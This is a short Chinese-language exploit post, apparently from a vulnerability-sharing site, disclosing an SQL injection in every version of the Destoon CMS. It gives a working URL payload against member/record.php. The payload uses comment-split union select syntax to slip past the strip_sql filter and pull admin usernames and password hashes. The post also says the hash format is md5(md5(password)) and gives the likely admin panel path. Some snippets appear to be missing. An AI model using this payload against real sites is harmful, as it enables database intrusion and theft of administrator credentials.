destoon 全版本SQL注入漏洞

在include/global.func.php 中strip_sql函数对传进来的值进行了过滤,但是我们可以绕过该限制,达到全版本注入

在member/record.php 中

调用了record.inc.php

其中$mid 是没经过过滤的,导致我们可以注入
但是前面有防注入处理?
看我们怎么绕过注入中的正则
http://0day5.com/member/record.php?action=pay&mid=-1+union//***/select//***/1,2,password,username,5,6,7,8,9 from destoon_member where admin=1– a
看看这样是不是可以了?
这样就达到可以绕过正则了。。。
当前。前缀肯定是有变化的了,我看使用

来获取前缀。再使用

来获得帐号和密码,密文为md5(md5(psw))类型,后台貌似为admin.php

Author:90sec 西毒

原文链接:,转发请注明来源!

发表评论

要发表评论,您必须先登录